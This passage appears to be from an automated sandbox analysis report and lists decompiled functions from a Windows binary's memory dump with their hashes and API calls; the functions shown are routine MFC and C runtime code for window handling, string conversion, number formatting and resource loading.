Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: EnableException@8FocusItemMenuMessageParentSendThrow
String ID:
API String ID: 4211600527-0
Opcode ID: 2772bf25f4ab90aceb57b13df30727eadadaefee4421662e148a64b8d13d8155
Instruction ID: 750e2516e64fc4909a352d3e2dc9ccd1161e051e180a7bd7097371a334fa1d29
Opcode Fuzzy Hash: 2772bf25f4ab90aceb57b13df30727eadadaefee4421662e148a64b8d13d8155
Instruction Fuzzy Hash: 4C115E71500600EFCB20AF20DCC886BB7BAFF943157148B3EF146629A1C774AC55CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0041176E, Relevance: 6.0, APIs: 4, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E0041176E(void* __ebx, void* __ecx, void* __edx, struct HWND__* _a4, int _a8, int _a12, long _a16, struct HWND__* _a20, struct HWND__* _a24) {
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HWND__* _t16;
				struct HWND__* _t18;
				struct HWND__* _t20;
				void* _t22;
				void* _t23;
				void* _t24;
				void* _t25;
				struct HWND__* _t26;

				_t24 = __edx;
				_t23 = __ecx;
				_t22 = __ebx;
				_t25 = GetTopWindow;
				_t16 = GetTopWindow(_a4);
				while(1) {
					_t26 = _t16;
					if(_t26 == 0) {
						break;
					}
					__eflags = _a24;
					if(__eflags == 0) {
						SendMessageA(_t26, _a8, _a12, _a16);
					} else {
						_t20 = E00410E69(_t22, _t24, _t25, _t26, __eflags, _t26);
						__eflags = _t20;
						if(__eflags != 0) {
							_push(_a16);
							_push(_a12);
							_push(_a8);
							_push( *((intOrPtr*)(_t20 + 0x20)));
							_push(_t20);
							E00411493(_t22, _t25, _t26, __eflags);
						}
					}
					__eflags = _a20;
					if(_a20 != 0) {
						_t18 = GetTopWindow(_t26);
						__eflags = _t18;
						if(_t18 != 0) {
							E0041176E(_t22, _t23, _t24, _t26, _a8, _a12, _a16, _a20, _a24);
						}
					}
					_t16 = GetWindow(_t26, 2);
				}
				return _t16;
			}

0x0041176e
0x0041176e
0x0041176e
0x00411776
0x0041177c
0x004117df
0x004117df
0x004117e3
0x00000000
0x00000000
0x00411780
0x00411784
0x004117ae
0x00411786
0x00411787
0x0041178c
0x0041178e
0x00411790
0x00411793
0x00411796
0x00411799
0x0041179c
0x0041179d
0x0041179d
0x0041178e
0x004117b4
0x004117b8
0x004117bb
0x004117bd
0x004117bf
0x004117d1
0x004117d1
0x004117bf
0x004117d9
0x004117d9
0x004117e8

APIs

GetTopWindow.USER32(?), ref: 0041177C
GetTopWindow.USER32(00000000), ref: 004117BB
GetWindow.USER32(00000000,00000002), ref: 004117D9

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: Window
String ID:
API String ID: 2353593579-0
Opcode ID: 9c7bbe8dd5b5794797cb38c513ce080931845729213d45fadcda55efb9624ec7
Instruction ID: 4dbeb012b4611ec7f843cae1e26a0394b9dc57c9159cc82a6f74d7eea3c5799b
Opcode Fuzzy Hash: 9c7bbe8dd5b5794797cb38c513ce080931845729213d45fadcda55efb9624ec7
Instruction Fuzzy Hash: 3C01003240011ABBCF126F519C04EDF3B26BF09354F044026FE25512B0C73AC9B1EBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0041112D, Relevance: 6.0, APIs: 4, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E0041112D(void* __ebx, void* __ecx, void* __edx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HWND__* _t9;
				struct HWND__* _t10;
				void* _t14;
				void* _t15;
				void* _t16;
				struct HWND__* _t17;
				struct HWND__* _t18;
				void* _t19;

				_t15 = __edx;
				_t14 = __ecx;
				_t13 = __ebx;
				_t9 = GetDlgItem(_a4, _a8);
				_t16 = GetTopWindow;
				_t17 = _t9;
				if(_t17 == 0) {
					L6:
					_t10 = GetTopWindow(_a4);
					while(1) {
						_t18 = _t10;
						__eflags = _t18;
						if(_t18 == 0) {
							goto L10;
						}
						_t10 = E0041112D(_t13, _t14, _t15, _t18, _a8, _a12);
						__eflags = _t10;
						if(_t10 == 0) {
							_t10 = GetWindow(_t18, 2);
							continue;
						}
						goto L10;
					}
				} else {
					if(GetTopWindow(_t17) == 0) {
						L3:
						_push(_t17);
						if(_a12 == 0) {
							return E00410E42(_t13, _t19);
						}
						_t10 = E00410E69(_t13, _t15, _t16, _t17, __eflags);
						__eflags = _t10;
						if(_t10 == 0) {
							goto L6;
						}
					} else {
						_t10 = E0041112D(__ebx, _t14, _t15, _t17, _a8, _a12);
						if(_t10 == 0) {
							goto L3;
						}
					}
				}
				L10:
				return _t10;
			}

0x0041112d
0x0041112d
0x0041112d
0x00411138
0x0041113e
0x00411144
0x00411148
0x00411178
0x0041117b
0x00411198
0x00411198
0x0041119a
0x0041119c
0x00000000
0x00000000
0x00411186
0x0041118b
0x0041118d
0x00411192
0x00000000
0x00411192
0x00000000
0x0041118d
0x0041114a
0x0041114f
0x00411161
0x00411165
0x00411166
0x00000000
0x00411168
0x0041116f
0x00411174
0x00411176
0x00000000
0x00000000
0x00411151
0x00411158
0x0041115f
0x00000000
0x00000000
0x0041115f
0x0041114f
0x004111a1
0x004111a1

APIs

GetDlgItem.USER32 ref: 00411138
GetTopWindow.USER32(00000000), ref: 0041114B

Part of subcall function 0041112D: GetWindow.USER32(00000000,00000002), ref: 00411192

GetTopWindow.USER32(?), ref: 0041117B

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Item
String ID:
API String ID: 369458955-0
Opcode ID: 984102cd6510390dc055500a7a971ef5f01235c015507f8d9f453651f7a45130
Instruction ID: 4f067f629f0563ab63cea53ecb5b6a740d5673adde4b126f2854eac85ffb1f17
Opcode Fuzzy Hash: 984102cd6510390dc055500a7a971ef5f01235c015507f8d9f453651f7a45130
Instruction Fuzzy Hash: 2F014F3250162EB7CF222B62DC00AEFBB19AF583A4F004026FF2495230D779C99196A9

Uniqueness

Uniqueness Score: -1.00%

Function 0043325A, Relevance: 6.0, APIs: 4, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0043325A(void* __ebx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;
				void* _t28;
				void* _t29;

				_t28 = __ebx;
				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E00432B57(_t29, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t35 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E00432C43(_t28, _t29, _a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E00433162(_t29, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E004330A9(_t29, _t35, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}

0x0043325a
0x0043325d
0x00433263
0x004332d6
0x00000000
0x0043326a
0x0043326a
0x0043326d
0x00433288
0x0043328b
0x004332ab
0x004332bd
0x0043328d
0x0043328d
0x00433290
0x00000000
0x00433292
0x004332a4
0x004332a4
0x00433290
0x004332db
0x004332df
0x0043326f
0x00433287
0x00433287
0x0043326d

APIs

__cftof_l.LIBCMT ref: 0043327E

Part of subcall function 004330A9: __fltout2.LIBCMT ref: 004330D3

__cftog_l.LIBCMT ref: 004332A4
__cftoe_l.LIBCMT ref: 004332D6

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
Instruction ID: ceb1fda13dc4798c48014f9535719efa93e0cb76fac7c7f9c2fc7a06ad8d816c
Opcode Fuzzy Hash: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
Instruction Fuzzy Hash: EF017E3640014ABBCF125E84CC118EF3F22BF1D356F589456FE1859171C33ACAB2AB85

Uniqueness

Uniqueness Score: -1.00%

Function 0042284E, Relevance: 6.0, APIs: 4, Instructions: 48
memoryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E0042284E(short* _a4) {
				char* _v0;
				int _v8;
				int _v16;
				void* __ecx;
				void* __ebp;
				int _t6;
				char* _t7;
				void* _t12;
				char* _t13;
				void* _t15;
				void* _t16;
				short* _t20;

				_t20 = _a4;
				if(_t20 != 0) {
					__imp__#7(_t20, _t16, _t12);
					_v8 = _t6;
					_t7 = WideCharToMultiByte(0, 0, _t20, _t6, 0, 0, 0, 0);
					_v0 = _t7;
					__imp__#150(0, _t7);
					_t13 = _t7;
					if(_t13 == 0) {
						E00415804(_t15);
					}
					WideCharToMultiByte(0, 0, _t20, _v16, _t13, _v8, 0, 0);
					return _t13;
				}
				return 0;
			}

0x00422850
0x00422859
0x00422862
0x00422876
0x0042287a
0x0042287e
0x00422882
0x00422888
0x0042288c
0x0042288e
0x0042288e
0x004228a1
0x00000000
0x004228a6
0x00000000

APIs

SysStringLen.OLEAUT32(?), ref: 00422862
WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,0000000C,00422F38,00000000,00000018,0042327E), ref: 0042287A
SysAllocStringByteLen.OLEAUT32(00000000,00000000), ref: 00422882
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000,?,?,0000000C,00422F38,00000000,00000018,0042327E), ref: 004228A1

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: Byte$CharMultiStringWide$Alloc
String ID:
API String ID: 3384502665-0
Opcode ID: ec344b905e45cd29d1ffbf7cebc4fec40b6d58e505551a2f193d41dbca85e95f
Instruction ID: 77ba6b3627eb304fb051c5f1923cefdcb469fa3daa648be2e60065ef3e2b6957
Opcode Fuzzy Hash: ec344b905e45cd29d1ffbf7cebc4fec40b6d58e505551a2f193d41dbca85e95f
Instruction Fuzzy Hash: 9CF012716062347F932127A6AC4CCABBE9CEE9A2B4B11062AF54992110D665D811C7F9

Uniqueness

Uniqueness Score: -1.00%

Function 0042D86B, Relevance: 6.0, APIs: 4, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E0042D86B(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				long _t23;
				void* _t29;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0x44a900);
				E00428FAC(__ebx, __edi, __esi);
				_t31 = E0042AA34(__ebx, _t35);
				_t15 =  *0x44fbf4; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E0042E21D(_t25, _t31, 0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x44faf8; // 0x23a1300
					if(__eflags != 0) {
						__eflags = _t33;
						if(_t33 != 0) {
							_t23 = InterlockedDecrement(_t33);
							__eflags = _t23;
							if(_t23 == 0) {
								__eflags = _t33 - 0x44f6d0;
								if(__eflags != 0) {
									_push(_t33);
									E00426256(_t25, _t29, _t31, _t33, __eflags);
								}
							}
						}
						_t21 =  *0x44faf8; // 0x23a1300
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0x44faf8; // 0x23a1300
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E0042D906();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				if(_t33 == 0) {
					E004272E4(_t29, 0x20);
				}
				return E00428FF1(_t33);
			}

0x0042d86b
0x0042d86b
0x0042d86b
0x0042d86b
0x0042d86d
0x0042d872
0x0042d87c
0x0042d87e
0x0042d886
0x0042d8a7
0x0042d8ad
0x0042d8b1
0x0042d8b4
0x0042d8b7
0x0042d8bd
0x0042d8bf
0x0042d8c1
0x0042d8c4
0x0042d8ca
0x0042d8cc
0x0042d8ce
0x0042d8d4
0x0042d8d6
0x0042d8d7
0x0042d8dc
0x0042d8d4
0x0042d8cc
0x0042d8dd
0x0042d8e2
0x0042d8e5
0x0042d8eb
0x0042d8ef
0x0042d8ef
0x0042d8f5
0x0042d8fc
0x0042d88e
0x0042d88e
0x0042d88e
0x0042d893
0x0042d897
0x0042d89c
0x0042d8a4

APIs

Part of subcall function 0042AA34: __getptd_noexit.LIBCMT ref: 0042AA35
Part of subcall function 0042AA34: __amsg_exit.LIBCMT ref: 0042AA42

__amsg_exit.LIBCMT ref: 0042D897
__lock.LIBCMT ref: 0042D8A7
InterlockedDecrement.KERNEL32(?), ref: 0042D8C4
InterlockedIncrement.KERNEL32(023A1300), ref: 0042D8EF

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd_noexit__lock
String ID:
API String ID: 2880340415-0
Opcode ID: 6887d924da00da28cdc0d453ed078d9dfb2306a098c8c4bced21838f58ca0f10
Instruction ID: 35052adc742c85db714840b182debaf6bc5b825d7df739bf827e39322e341558
Opcode Fuzzy Hash: 6887d924da00da28cdc0d453ed078d9dfb2306a098c8c4bced21838f58ca0f10
Instruction Fuzzy Hash: 80018E31F01731DBDB20BB65B405B5A7360AF05724F95006BF824A7690CB2C6981CBAE

Uniqueness

Uniqueness Score: -1.00%

Function 004139D6, Relevance: 6.0, APIs: 4, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004139D6(void* __ecx, CHAR* _a4) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HRSRC__* _t8;
				void* _t9;
				void* _t11;
				void* _t14;
				void* _t15;
				void* _t16;
				struct HINSTANCE__* _t17;
				void* _t18;

				_t14 = 0;
				_t11 = 0;
				_t19 = _a4;
				_t18 = __ecx;
				if(_a4 == 0) {
					L4:
					_t16 = E0041358D(_t11, _t18, _t11);
					if(_t11 != 0 && _t14 != 0) {
						FreeResource(_t14);
					}
					return _t16;
				}
				_t17 =  *(E0040E67F(0, 0, _t15, _t19) + 0xc);
				_t8 = FindResourceA(_t17, _a4, 0xf0);
				if(_t8 == 0) {
					goto L4;
				}
				_t9 = LoadResource(_t17, _t8);
				_t14 = _t9;
				if(_t14 != 0) {
					_t11 = LockResource(_t14);
					goto L4;
				}
				return _t9;
			}

0x004139da
0x004139dc
0x004139de
0x004139e2
0x004139e4
0x00413a19
0x00413a23
0x00413a25
0x00413a2c
0x00413a2c
0x00000000
0x00413a32
0x004139eb
0x004139f8
0x00413a00
0x00000000
0x00000000
0x00413a04
0x00413a0a
0x00413a0e
0x00413a17
0x00000000
0x00413a17
0x00413a38

APIs

FindResourceA.KERNEL32(?,?,000000F0), ref: 004139F8
LoadResource.KERNEL32(?,00000000,?,?,?,?,0040C4A0,?,?,0040123C,765B253D), ref: 00413A04
LockResource.KERNEL32(00000000,?,?,?,?,0040C4A0,?,?,0040123C,765B253D), ref: 00413A11
FreeResource.KERNEL32(00000000,?,?,?,?,0040C4A0,?,?,0040123C,765B253D), ref: 00413A2C

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: Resource$FindFreeLoadLock
String ID:
API String ID: 1078018258-0
Opcode ID: 4e3c77c9b9b666cd702583e4951af05c427353e7159d5c54de967bcdbd13f234
Instruction ID: 4158fac1272381247e57c3a91ade4f76fa434850552cd164254ce42a78dc5ab4
Opcode Fuzzy Hash: 4e3c77c9b9b666cd702583e4951af05c427353e7159d5c54de967bcdbd13f234
Instruction Fuzzy Hash: 10F0F03A3012012F87106FA6AC449BBB6ACDFD07A6705003EBD05E2311DF28CD4182A8

Uniqueness

Uniqueness Score: -1.00%

Function 0040C911, Relevance: 6.0, APIs: 4, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040C911() {
				intOrPtr _t16;
				struct HWND__* _t19;
				intOrPtr _t23;
				intOrPtr* _t28;
				void* _t29;

				_t28 =  *((intOrPtr*)(_t29 - 0x20));
				_t23 =  *((intOrPtr*)(_t29 - 0x24));
				if( *((intOrPtr*)(_t29 - 0x28)) != 0) {
					E00415A8F(_t23, 1);
				}
				if( *((intOrPtr*)(_t29 - 0x2c)) != 0) {
					EnableWindow( *(_t29 - 0x14), 1);
				}
				if( *(_t29 - 0x14) != 0) {
					_t19 = GetActiveWindow();
					_t34 = _t19 -  *((intOrPtr*)(_t28 + 0x20));
					if(_t19 ==  *((intOrPtr*)(_t28 + 0x20))) {
						SetActiveWindow( *(_t29 - 0x14));
					}
				}
				 *((intOrPtr*)( *_t28 + 0x60))();
				E0040C346(_t23, _t28, 0, _t28, _t34);
				if( *((intOrPtr*)(_t28 + 0x58)) != 0) {
					FreeResource( *(_t29 - 0x18));
				}
				_t16 =  *((intOrPtr*)(_t28 + 0x44));
				return E004272B2(_t16);
			}

0x0040c911
0x0040c914
0x0040c91c
0x0040c922
0x0040c922
0x0040c92a
0x0040c931
0x0040c931
0x0040c93a
0x0040c93c
0x0040c942
0x0040c945
0x0040c94a
0x0040c94a
0x0040c945
0x0040c954
0x0040c959
0x0040c961
0x0040c966
0x0040c966
0x0040c96c
0x0040c974

APIs

EnableWindow.USER32(?,00000001), ref: 0040C931
GetActiveWindow.USER32 ref: 0040C93C
SetActiveWindow.USER32(?,?,00000024,004010BD), ref: 0040C94A
FreeResource.KERNEL32(?,?,00000024,004010BD), ref: 0040C966

Part of subcall function 00415A8F: EnableWindow.USER32(?,?), ref: 00415A9C

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$ActiveEnable$FreeResource
String ID:
API String ID: 253586258-0
Opcode ID: 22bd91b732e3fae5fd631a286440de14b97e42acd2df7da6e9b48bea0e6de6cc
Instruction ID: 744bb28800fb384e21909c5947eaf0ac6f02e8d0cf1f7e8d348eb5a8325908a8
Opcode Fuzzy Hash: 22bd91b732e3fae5fd631a286440de14b97e42acd2df7da6e9b48bea0e6de6cc
Instruction Fuzzy Hash: A3F0FF30A00605DFCF21AFA4D9855AEBBB1BF58706F50123AF542722E1CB3A6D40CF59

Uniqueness

Uniqueness Score: -1.00%

Function 004242D6, Relevance: 6.0, APIs: 4, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E004242D6(intOrPtr _a4, intOrPtr _a8) {
				long _t4;
				long _t5;
				void* _t7;
				void* _t8;
				void* _t12;

				_t13 = _a4;
				if(_a4 == 0) {
					__eflags =  *0x452a68;
					if( *0x452a68 == 0) {
						_t5 = GetTickCount();
						 *0x452a68 =  *0x452a68 + 1;
						__eflags =  *0x452a68;
						 *0x44f274 = _t5;
					}
					_t4 = GetTickCount() -  *0x44f274;
					__eflags = _t4 - 0xea60;
					if(_t4 > 0xea60) {
						__imp__CoFreeUnusedLibraries();
						_t4 = GetTickCount();
						 *0x44f274 = _t4;
					}
					return _t4;
				}
				return E0042427F(_t7, _t8, _t12, _t13, _a8);
			}

0x004242d6
0x004242db
0x004242e8
0x004242f6
0x004242f8
0x004242fa
0x004242fa
0x00424300
0x00424300
0x00424307
0x0042430d
0x00424312
0x00424314
0x0042431a
0x0042431c
0x0042431c
0x00000000
0x00424321
0x00000000

APIs

GetTickCount.KERNEL32 ref: 004242F8
GetTickCount.KERNEL32 ref: 00424305
CoFreeUnusedLibraries.OLE32 ref: 00424314
GetTickCount.KERNEL32 ref: 0042431A

Part of subcall function 0042427F: CoFreeUnusedLibraries.OLE32(00000000,0042435E,00000000), ref: 004242C3
Part of subcall function 0042427F: OleUninitialize.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,0042435E), ref: 004242C9

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: CountTick$FreeLibrariesUnused$Uninitialize
String ID:
API String ID: 685759847-0
Opcode ID: 5cbbac071adde92550bb7df493eca704fd6f634656887f5f14a72f499b10bdc5
Instruction ID: 96ee359ccc795dc994d3884e4b924cb2febb2a1018f9c4fa87206d9b434116df
Opcode Fuzzy Hash: 5cbbac071adde92550bb7df493eca704fd6f634656887f5f14a72f499b10bdc5
Instruction Fuzzy Hash: 6BE06D34E04620DACB20EB34FD0421A3BA4FB96302F4045B7E44042160C7B85D84CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 0041D05C, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 170
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E0041D05C(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t103;
				intOrPtr* _t104;
				signed int _t106;
				signed int _t118;
				intOrPtr* _t122;
				signed int _t138;
				signed int _t146;
				void* _t149;
				signed int _t150;
				signed int _t174;
				signed int _t176;
				void* _t177;
				void* _t182;
				signed int _t184;
				void* _t185;
				void* _t187;

				_t172 = __edx;
				_t186 = __ecx;
				_t146 = 0;
				if( *((intOrPtr*)(__ecx + 0x48)) == 0) {
					__eflags =  *(__ecx + 0x40);
					if( *(__ecx + 0x40) == 0) {
						L9:
						_t149 = 0;
						__eflags =  *((intOrPtr*)(_t186 + 0x10)) - _t146;
						 *(_t186 + 0x38) = _t146;
						if( *((intOrPtr*)(_t186 + 0x10)) <= _t146) {
							L12:
							_t103 =  *(_t186 + 0x38);
							__eflags = _t103 - _t146;
							if(__eflags > 0) {
								_t176 = 0x30;
								_t172 = _t103 * _t176 >> 0x20;
								_t167 =  ~(__eflags > 0) | _t103 * _t176;
								 *((intOrPtr*)(_t186 + 0x3c)) = E0040A3C7( ~(__eflags > 0) | _t103 * _t176, _t167);
							}
							__eflags =  *((intOrPtr*)(_t186 + 0x10)) - _t146;
							_v12 = _t146;
							_v16 = _t146;
							if( *((intOrPtr*)(_t186 + 0x10)) <= _t146) {
								L21:
								_t150 =  *(_t186 + 0x38);
								_t104 =  *((intOrPtr*)(_t186 + 8));
								 *((intOrPtr*)( *_t104 + 0x10))(_t104, _t150,  *((intOrPtr*)(_t186 + 0x3c)), _t150 << 4, _t146);
								_t106 =  *(_t186 + 0x38);
								__eflags = _t106 - _t146;
								if(__eflags != 0) {
									_t174 = 0x10;
									_t156 =  ~(__eflags > 0) | _t106 * _t174;
									 *(_t186 + 0x40) = E0040A3C7( ~(__eflags > 0) | _t106 * _t174, _t156);
								}
								__eflags =  *(_t186 + 0x38) - _t146;
								if( *(_t186 + 0x38) <= _t146) {
									L26:
									E0041C7B6(_t186);
									return  *((intOrPtr*)( *_t186 + 0x10))();
								} else {
									_t182 = 0;
									__eflags = 0;
									do {
										E004277B0(_t182,  *(_t186 + 0x40) + _t182, 0, 0x10);
										 *(_t182 +  *(_t186 + 0x40)) =  *(_t182 +  *(_t186 + 0x40)) & 0x00000000;
										_t187 = _t187 + 0xc;
										_t146 = _t146 + 1;
										_t182 = _t182 + 0x10;
										__eflags = _t146 -  *(_t186 + 0x38);
									} while (_t146 <  *(_t186 + 0x38));
									goto L26;
								}
							} else {
								_v8 = _t146;
								do {
									_t118 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t186 + 0x14)) + _v8 + 0x24)) + 4));
									__eflags = _t118 - _t146;
									_v20 = _t118;
									if(_t118 == _t146) {
										goto L20;
									}
									_t184 = _v12 * 0x30;
									__eflags = _t184;
									do {
										_t122 = E0040B523( &_v20);
										E0041A3B7(_t172,  *((intOrPtr*)(_t186 + 0x3c)) + _t184,  *((intOrPtr*)(_t186 + 0x14)) + _v8);
										 *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x18) = _v12 << 4;
